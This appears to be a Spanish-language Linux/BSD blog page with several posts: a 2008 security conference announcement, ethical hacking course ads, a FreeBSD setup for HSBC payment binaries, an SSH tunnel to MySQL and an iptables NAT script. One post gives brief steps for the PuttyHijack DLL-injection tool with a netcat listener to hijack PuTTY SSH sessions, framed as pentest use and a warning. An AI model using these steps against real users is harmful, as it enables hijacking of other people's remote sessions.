Estamos iniciando la etapa de los cursos de Linux en sus niveles básico, medio y avanzado.
Si estas interesado en un curso danos tu opión de cuanto estarías dispuesto a pagar por el.
Escrito por
roa en
seguridad ""
El “Congreso de Seguridad en Cómputo” 2008 permite reunir a investigadores reconocidos a nivel mundial quienes podrán compartir las nuevas tendencias de la seguridad informática con los distintos asistentes provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado.Este evento está divido en dos etapas: las Líneas de Especialización en Seguridad Informática enfocadas a cubrir las principales áreas de Seguridad en Cómputo, y el ciclo de Conferencias Magistrales impartidas por reconocidos expertos en seguridad informática que acuden a este magno evento para compartir sus últimas investigaciones y experiencias en el área.
Las Líneas de Especialización en Seguridad Informática se llevarán a cabo del 19 al 24 de septiembre del 2008 y tendrán como sede el Centro de Extensión DGSCA Tlatelolco. Las Conferencias Magistrales tendrán lugar los días 25 y 26 de septiembre del 2008 en el Palacio de Minería.""
Escrito por
roa en
linux,
fedora,
redhat Online intruders hit Red Hat, Fedora Project
Esta tool llamada PuttyHijack Su descripción dice mas que mil palabras
"“PuttyHijack is a POC tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers.”""
Requerimientos
Windows Machine
Netcat
Putty
PuttyHijack
##Manos a la obra
nc -vv -lp 6666 <<<No Requiere Explicación oh si?
putty.exe cualquier server
PuttyHijack.exe 127.0.0.1 6666
Después de esto estoy seguro que lo pensaran antes de conectarse a sus servidores usando Putty desde cualquier Cyber Cafe
Anexo Screen
PuttyHijack
Segun el PDF que dan en HSBC se pueden Linux / Solaris/ Windows
http://leadingedgescripts.co.uk/hsbccreditcardslinux.php
Dare por echo que ya esta funcionando cgi-bin en su servidor web
y que ya tenemos habilitado el certificado web que nos piden en hsbc junto con sus permisos correspondientes.
Pero siguiendo todo esos pasos no funciona Y entonces hay que habilitar el soporte de “Linux Binary Compatibility” en FreeBSD
##
bash-2.05b$ ldd OrderHash.e
OrderHash.e:
ELF interpreter /lib/ld-linux.so.2 not found
OrderHash.e: signal 6
bash-2.05b$ ldd Results.e
Results.e:
ELF interpreter /lib/ld-linux.so.2 not found
Results.e: signal 6
bash-2.05b$ ldd TestHash.e
TestHash.e:
ELF interpreter /lib/ld-linux.so.2 not found
TestHash.e: signal 6
bash-2.05b$ file *.e
OrderHash.e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
Results.e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
TestHash.e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped
bash-2.05b$
Y nuestro servidor es FreeBSD
#kldload linux
Agregamos a /etc/rc.conf
linux_enable=“YES”
Instalar el Port
cd /usr/ports/emulators/linux_base-fc4
make install distclean
Copiar
cp libCcCpiTools.so /usr/lib
correr el comando
ldconfig
Luego nuevamente Verificar
ldd *.e
OrderHash.e:
libCcCpiTools.so => /usr/lib/libCcCpiTools.so (0x28067000)
libstdc++-libc6.2-2.so.3 => /usr/lib/libstdc++-libc6.2-2.so.3 (0x28079000)
libm.so.6 => /lib/obsolete/linuxthreads/libm.so.6 (0x280be000)
libc.so.6 => /lib/obsolete/linuxthreads/libc.so.6 (0x280e4000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x28203000)
/lib/ld-linux.so.2 (0x2804a000)
Results.e:
libCcCpiTools.so => /usr/lib/libCcCpiTools.so (0x28067000)
libstdc++-libc6.2-2.so.3 => /usr/lib/libstdc++-libc6.2-2.so.3 (0x28079000)
libm.so.6 => /lib/obsolete/linuxthreads/libm.so.6 (0x280be000)
libc.so.6 => /lib/obsolete/linuxthreads/libc.so.6 (0x280e4000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x28203000)
/lib/ld-linux.so.2 (0x2804a000)
TestHash.e:
libCcCpiTools.so => /usr/lib/libCcCpiTools.so (0x28066000)
libstdc++-libc6.2-2.so.3 => /usr/lib/libstdc++-libc6.2-2.so.3 (0x28078000)
libm.so.6 => /lib/obsolete/linuxthreads/libm.so.6 (0x280bd000)
libc.so.6 => /lib/obsolete/linuxthreads/libc.so.6 (0x280e3000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x28202000)
/lib/ld-linux.so.2 (0x28049000)
#Por ultimo checar nuestros sample.html (previamente ya editado
y configurado)
Link
A parchar Nuestros DNS
¿En qué consiste CEH (Certified Ethical Hacking)?
La práctica del hacking ético permite realizar las
pruebas de penetración con el fin de indentificar huecos de seguridad en la red
así como sistemas corporativos, antes de que un usuario mal intencionado lo
haga. La metodología y las técnicas que los hackers utilizan para penetrar a
las corporaciones es llevada al campo de la seguridad,
con el fin de incluir en los planes organizacionales las auditorias de
seguridad necesarias. Esto desde el punto de vista de la protección, permite la
elaboración de un plan con el fin de establecer las contramedidas necesarias
para salvaguardar la seguridad de la información.
El curso hacking ético le dará a los participantes
las habilidades necesarias para realizar la simulación de ataques tal y como
son llevados a cabo por usuarios maliciosos, con el fin de identificar brechas
de seguridad en los sistemas y redes corporativas, lo cual es vital para
establecer un plan que subsane dichas debilidades y vulnerabilidades, y con
esto reducir el nivel de riesgo al que están expuestas las organizaciones hoy
en día.
¿En qué consiste CHFI (Computer Hacker and Foreinsic
Investigator)?
La investigación forense de ataques informáticos es
el proceso que permite detectar ataques
informáticos y extraer la evidencia de manera apropiada para reportar el
crimen, llevando a cabo auditorias para prevenir futuros ataques. La
computación forense es simplemente la aplicación de la investigación
informática y las técnicas de análisis con el interés de determinar evidencia
legal. La evidencia podría buscarse en un amplio rango del mal uso de la
informática o de crímenes informáticos, incluyendo entre otros el robo de
secretos comerciales, robo o destrucción de la propiedad intelectual, y fraude.
Los investigadores CHFI dispondrán de una serie de métodos para descubrir los
datos que residen en un sistema computacional, o para recuperar archivos de
información borrados, dañados o encriptados.
También permite la identificación
sistemática y cuidadosa de evidencia en una computadora involucrada en algún
crimen o caso de abuso. Esto va desde rastrear los pasos de un hacker a través
del sistema de un cliente, localizar al autor de correos electrónicos
difamatorios, hasta recuperar señales de fraude.
El curso investigación forense dará a los
participantes las habilidades necesarias para identificar las huellas de un
intruso recopilando apropiadamente la evidencia necesaria para procesarlo.
Muchas de las herramientas líderes de la industria forense serán aplicadas en
el curso, incluyendo software, hardware y técnicas especializadas.
Los cursos están dirigidos a personal
encargado de la seguridad de la información, auditores, profesionales en
seguridad, administradores de sistemas, profesionales con la responsabilidad a
su cargo de la integridad en una infraestructura de red, personas que se
desempeñan en el área de las Tecnologías de Información, departamentos de
Informática o Sistemas, y a todas aquellas personas que deseen adquirir un
conocimiento más profundo y práctico acerca de cómo defender sus
infraestructuras tecnológicas de
las amenazas actuales. Tienen como finalidad preparar a los asistentes para los
exámenes de EC-Council Certified Ethical Hacker (312-50) y EC-Council Computer
Hacker and Forensics Investigator (312-49).
El objetivo es promover en los asistentes la
formación de talentos en seguridad de la información y redes que provean servicios
de defensa a las organizaciones contra ataques informáticos, utilizando las
herramientas y técnicas aprendidas en base a la
legalidad; con la posibilidad de certificarse ante un organismo reconocido por
la industria de Tecnologías de Información a nivel mundial.
Itinerarios de Cursos en la Universidad del Caribe
|
Curso
|
Fechas
|
Costo / Persona
|
|
Seguridad en Redes basado en Ethical Hacking
|
21 – 26 Julio
Lun/Vie: 17 – 22 Hrs
Sáb: 9 – 15 Hrs
|
$10,000 MN
|
|
Investigación forense en Intrusiones Informáticas
|
28 Julio - 1 Agosto
9 – 17 Hrs
|
$12,000 MN
|
Incluye:
o
Material
didáctico y CD de herramientas
o
Instructores
certificados
Acceso al laboratorio con las facilidades para
realizar las prácticas que requiere el curso, el participante no requiere
llevar máquina o software alguno.
Conocimientos previos:
o
Conocimiento
de redes y protocolos
o
Manejo
adecuado de Windows & Linux
o
Manejo de
conceptos de seguridad de redes
o
Comprensión
oral y escrita del idioma inglés
Instructores:
Krishna Rajagopal
es un experimentado hacker ético, posee más de 50 certificaciones técnicas y es
reconocido por cuerpos de seguridad en varios países, así como en instituciones
de renombre internacional como la Scotland Yard.
M.Santiago
Monterrosa quién también es hacker ético y cuenta con amplia experiencia en el
mundo de las Tecnologías de la Información en empresas como IBM entre otras.
Para mayores informes con mariobenitez@hotmail.com
Escrito por
roa en
openbsd
Escrito por
roa en (sin categoría)
Requerimientos tener acceso ssh en ambos servidores
Servidor A (Servidor Donde Se encuentran las BD)
Servidor B (Servidor el cual se conectara remotamente a la BD del servidor A)
Si si ya se que se puede sin necesidad de estos tuneles, Pero soy algo paranoico , así que este es mi tutorial y a alguien mas le servirá.
#En el servidor B
Ejecutamos esta comando
bash# ssh -N -f -L 3307:localhost:3306 myuser@servidorA -p 3313 < El proceso se ira a background
Password:
bash# mysql -P 3307 -u root -h 127.0.0.1 -p < Aqui solo nosotros nos conectaremos a el puerto que tenemos en el tunel que fue 3307 y listo
Ya lo demás se lo dejo a su imaginación
Dudas , Comentarios , Sugerencias a roa@unixmexico.org
Escrito por
k001 en
reminder
#!/bin/sh
# Definiendo interfaces interna (lan), externa (inet)
# y programa IPTABLES (iptables)
# Activando reenvio de paquetes en el kernel
echo “1” > /proc/sys/net/ipv4/ip_forward
# Activando medidas de direccionamiento dinamico
echo “1” > /proc/sys/net/ipv4/ip_dynaddr
lan=eth0
inet=ppp0
NETZ=“192.168.100.0/24”
IPTABLES=“/sbin/iptables”
$IPTABLES -F
$IPTABLES -P INPUT ACCEPT
$IPTABLES -F INPUT
echo -e “---------------------------------------------------------------\n”
echo -e “NAT en el dispositivo $inet para la red:$NETZ activo!”
$IPTABLES -t nat -A POSTROUTING -o $inet -s $NETZ -j MASQUERADE
echo -e “---------------------------------------------------------------\n ”
¿Olvidaste tu contraseña?
Obtén tu cuenta
Un comentario
{ linux, bsd, cursos, conferencias }
